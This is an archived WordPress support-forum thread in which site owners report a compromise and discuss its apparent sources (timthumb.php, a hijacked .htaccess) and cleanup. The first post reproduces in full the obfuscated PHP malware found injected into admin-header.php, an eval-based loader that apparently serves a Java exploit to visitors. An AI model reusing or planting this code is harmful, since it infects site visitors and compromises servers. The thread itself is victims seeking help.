Title: java exploit hack in wp 3.3. beta
Last modified: August 20, 2016

---

# java exploit hack in wp 3.3. beta

 *  [SBfoto](https://wordpress.org/support/users/256studio/)
 * (@256studio)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/)
 * I just got a java exploit error from my anti-virus and I cant log into my admin
   of my site.
    This is what my virus program called it. Exploit:Java/CVE-2010-0840.
   KM
 * [http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Exploit%3aJava%2fCVE-2010-0840.KM&threatid=2147649278](http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Exploit%3aJava%2fCVE-2010-0840.KM&threatid=2147649278)
 * The exploit start at line 127 of the wp-admin/admin-header.php file
 *     ```
       if ( $parent_file == 'options-general.php' )
       	require(ABSPATH . 'wp-admin/options-head.php');
       <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
       ```
   

Viewing 15 replies - 1 through 15 (of 28 total)

1 [2](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/page/2/?output_format=md)

 *  [Diegazo](https://wordpress.org/support/users/diegazo/)
 * (@diegazo)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347424)
 * I have wordpress 3.2.1 and i had the same problem. Yo need to delate that lines
   in all your index.php files (themes, wp-content…) and your blog will work again
   😉
 *  [mrcupp](https://wordpress.org/support/users/mrcupp/)
 * (@mrcupp)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347437)
 * i’ve got it on 2 sites; second time in a month since installing/upgrading to 
   3.2.1
 * [@diegazo](https://wordpress.org/support/users/diegazo/), easy fix yes; total
   pain when one site is over 500 instances of the exploit 😉
 * i’ve found it in the following places in my sites:
 *     ```
       *home.php
         *index.php
         *default.php
       ```
   
 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347438)
 * Guys? You’re hacked. That’s not included with WordPress and just deleting the
   references won’t close the door. Unless you secure your installations, this will
   keep happening.
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
 *  [Diegazo](https://wordpress.org/support/users/diegazo/)
 * (@diegazo)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347440)
 * [@mrcupp](https://wordpress.org/support/users/mrcupp/)
 * Yes, the hack is in all files with that name (or if they have that words in the
   name). I’ve WordPress MU and i deleted all files by hand (over 90).
 * We discover the problem. It’s about timthumb.php. We were atacked on September,
   and yesterday. We fix the problem on September (update timthumb, clean .htaccess),
   but we didn’t clean themes cache (Minimal, Coldstone…), and there were two malicious
   files (php and png). That files were the last visited before yesterday atack.
   The IP was 83.103.119.239. Erase all that files and all will be ok.
 *  [mrcupp](https://wordpress.org/support/users/mrcupp/)
 * (@mrcupp)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347441)
 * [@diegazo](https://wordpress.org/support/users/diegazo/), exactly the same on
   my primary site (running MU) that got hit in sept as well. totally forgot about
   the cache in the themes 🙁 600 files to clean up…wpmu site had about 50 themes
   on it, and around 25 plugins.
 *  [Chip Bennett](https://wordpress.org/support/users/chipbennett/)
 * (@chipbennett)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347486)
 * I don’t think this is alpha/beta-testing related.
 *  Thread Starter [SBfoto](https://wordpress.org/support/users/256studio/)
 * (@256studio)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347500)
 * I was using the beta version of wp when this happen. But I have other site that
   got hit at the sane time that was using 3.2.1
 *  [Chip Bennett](https://wordpress.org/support/users/chipbennett/)
 * (@chipbennett)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347504)
 * > I was using the beta version of wp when this happen.
 * Right, but that’s just coincidental. You’ll get better response by posting in
   the correct forum, i.e. How-To and Troubleshooting; the people monitoring the
   Alpha/Beta forum are generally looking for WP 3.3 bugfixes, and would probably
   be less-likely to respond to a general site-hack topic in that forum.
 * Fortunately, one of the moderators moved your post for you. 🙂
 *  [thabob](https://wordpress.org/support/users/thabob/)
 * (@thabob)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347559)
 * Here is what I used to fix it, without restoring backups. Had over 2000 clients’s
   files infected. Use it at your own risks or advice your sysadmin to run it.
 * _[Code moderated as per the [Forum Rules](http://codex.wordpress.org/Forum_Welcome#Posting_Code).
   The maximum number of lines of code that you can post in these forums is **ten
   lines**. Please use the [pastebin](http://wordpress.pastebin.com/)]_
 *  Thread Starter [SBfoto](https://wordpress.org/support/users/256studio/)
 * (@256studio)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347560)
 * thabob, you need to turn that into a plugin.. that say runs a cron job on a time
   schedule…
 *  [thabob](https://wordpress.org/support/users/thabob/)
 * (@thabob)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347561)
 * I need to find the source first, I am not even sure it is a WordPress that caused
   this. I did not found any file named timthumb.php. I also have joomlaa, drupal
   and wikis installed. Plus it appears my WPs were working fine.
 * Make it run as a cron job once solve this problem, it just recover if your backup
   procedure is to heavy.
 *  [mrcupp](https://wordpress.org/support/users/mrcupp/)
 * (@mrcupp)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347568)
 * the first time the exploit occurred for me was back in sept, and was a hijacked.
   htaccess file that was including a “Thumbs.DB” file, which was in the root of
   the wordpress install. It contained the same line of code that is included at
   the end of all the infected .php files.
 * I have a copy of the most recent hack, and can put it up on a hackpad if needed.
   I however don’t have the original Thumbs.DB file since I purged it after the 
   last cleanup.
 *  [MickeyRoush](https://wordpress.org/support/users/mickeyroush/)
 * (@mickeyroush)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347574)
 * > the first time the exploit occurred for me was back in sept, and was a hijacked.
   > htaccess file that was including a “Thumbs.DB” file, which was in the root 
   > of the wordpress install.
 * Thumb.db is a Windows (MS) construct. I notice that some theme/plugin developers
   leave that and the Mac version (DS_Store) in their directories by accident. Strange
   that you found one in the root.
 * > I have a copy of the most recent hack, and can put it up on a hackpad if needed.
 * Can you put it up on pastebin (please use pastebin per forum rules) and post 
   the link here? I’d like to examine it.
 *  [mrcupp](https://wordpress.org/support/users/mrcupp/)
 * (@mrcupp)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347579)
 * [@mickeyroush](https://wordpress.org/support/users/mickeyroush/), it’s a known
   exploit that has been popping up on a lot of WP based sites (which are probably
   not up to date on security releases). I don’t think it really is WP related though.
   I’ve found a few friends who have been affected by this same exploit on servers
   w/out WP installed. It is more than likely an exploit tied back to phpMyAdmin
   or a server out-of-date on it’s security releases. (i know mine is out of date
   for a few apps).
 * the Thumbs.DB exploit was talked about here a few months back actually. here 
   is the link to that forum entry: [http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue](http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue)
 * here’s is the ta”offical” release about the “Tim Thumb” 0day exploit: [http://www.hackersbay.in/2011/08/tim-thumb-wordpress-exploit.html](http://www.hackersbay.in/2011/08/tim-thumb-wordpress-exploit.html)
 * here is the link to the pastebin I just made for this as well: [http://wordpress.pastebin.ca/2090298](http://wordpress.pastebin.ca/2090298)
 *  [MickeyRoush](https://wordpress.org/support/users/mickeyroush/)
 * (@mickeyroush)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/#post-2347581)
 * > the Thumbs.DB exploit was talked about here a few months back actually. here
   > is the link to that forum entry: [http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue](http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue)
 * Thanks for the link on that. I wasn’t aware of the thumbs.db exploit.
 * I am aware of the the timthumb exploit. I had to create my own directives to 
   stop the fingerprinting of it.
 * Checking out pastebin now…….thanks.

Viewing 15 replies - 1 through 15 (of 28 total)

1 [2](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/page/2/?output_format=md)

The topic ‘java exploit hack in wp 3.3. beta’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 28 replies
 * 17 participants
 * Last reply from: [taloweb](https://wordpress.org/support/users/taloweb/)
 * Last activity: [13 years, 11 months ago](https://wordpress.org/support/topic/java-exploit-hack-in-wp-33-beta/page/2/#post-2347823)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics